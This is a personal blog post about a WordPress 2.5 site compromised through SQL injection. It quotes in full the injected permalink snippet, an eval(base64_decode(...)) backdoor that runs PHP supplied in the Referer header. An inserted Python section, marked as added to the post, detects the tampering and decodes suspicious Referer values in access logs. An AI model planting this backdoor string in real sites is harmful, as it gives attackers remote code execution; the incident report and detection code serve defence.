Martin @ Blog

software development and life.


My blog was hacked

So, if anybody is still visiting this weblog (probably not many people anymore, partly because I haven’t posted anything recently…), they will definitely have noticed that I was a victim of one of the many exploits that are available for WordPress weblogs. The front page looked alright, but if one tried to view a single post or clicked some random link on my weblog, the page didn’t work. Of course, I was running an old version of WordPress (2.5 actually…).

After some quick research, it seems there was a bug in WordPress which made it possible to alter the database using SQL injection. I was the victim of a widely available exploit which changed the permalink URLs to something ending with %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/. This was done by changing the permalink option of WordPress, which appends this snippet to every URL.

It is quite obvious what it does: everything in the HTTP_REFERER header is base64-decoded and evaluated as PHP. So anybody could execute PHP code on my server simply by putting it in the Referer header of a request (which is very easy to do).
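As an added illustration (not code from the original post), here are the two checks a site owner would run after an incident like this: whether the stored permalink structure carries the eval() marker, and whether the web server access log contains Referer values that are base64 and decode to a PHP statement. The combined log format, the sample log lines and the probe payload are constructed assumptions.

```python
import base64
import re

# Constructed sample option values: a normal permalink structure and one
# carrying the injected snippet described in the post.
CLEAN_PERMALINK = "/%year%/%monthnum%/%postname%/"
INJECTED_PERMALINK = (
    "/%year%/%monthnum%/%postname%/"
    "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/"
)

# Markers that never belong in a legitimate permalink_structure option.
SUSPICIOUS_TOKENS = ("eval(", "base64_decode(", "$_SERVER", "${")


def permalink_is_tampered(structure: str) -> bool:
    """True if the permalink option carries code-execution markers."""
    return any(tok in structure for tok in SUSPICIOUS_TOKENS)


# Combined log format: the last two quoted fields are Referer and User-Agent.
LOG_TAIL_RE = re.compile(r'"(?P<referer>[^"]*)" "[^"]*"$')
# A decoded Referer that looks like a PHP call statement: name(...);
PHP_STATEMENT_RE = re.compile(r"[A-Za-z_]\w*\s*\(.*\)\s*;")


def decoded_php_referer(log_line: str):
    """Return the decoded Referer if it is base64 that decodes to a PHP
    statement, otherwise None. Ordinary URLs fail strict base64 decoding."""
    m = LOG_TAIL_RE.search(log_line)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group("referer"), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if PHP_STATEMENT_RE.search(decoded) else None


def find_php_referers(lines):
    """Return (client_ip, decoded_referer) for every suspicious log line."""
    hits = []
    for line in lines:
        decoded = decoded_php_referer(line)
        if decoded is not None:
            hits.append((line.split(" ", 1)[0], decoded))
    return hits


# Constructed sample log lines; the probe payload is a harmless print() call.
PROBE_REFERER = base64.b64encode(b'print("hello");').decode()
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Oct/2009:10:00:00 +0000] "GET /2009/10/post/ HTTP/1.1" 200 512 "http://example.com/" "Mozilla/5.0"',
    f'203.0.113.9 - - [10/Oct/2009:10:00:01 +0000] "GET /2009/10/post/ HTTP/1.1" 200 512 "{PROBE_REFERER}" "curl/7.19"',
]
```

In practice the first check is a single query against the wp_options table and the second a pass over the full access log, but both reduce to the functions above.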

Many victims of this hack report finding additional administrator accounts on their blog. Fortunately, that was not the case with my blog.

This is the first time in my life I have been the target of hackers or anything like that.

More information on how to deal with this hack can be found on the weblog Journey Etc.

By the way, I have to say that the new admin interface that comes with WordPress 2.8.4 is very nice. It is definitely an improvement over the old one (whose source code also wasn’t very nice…).
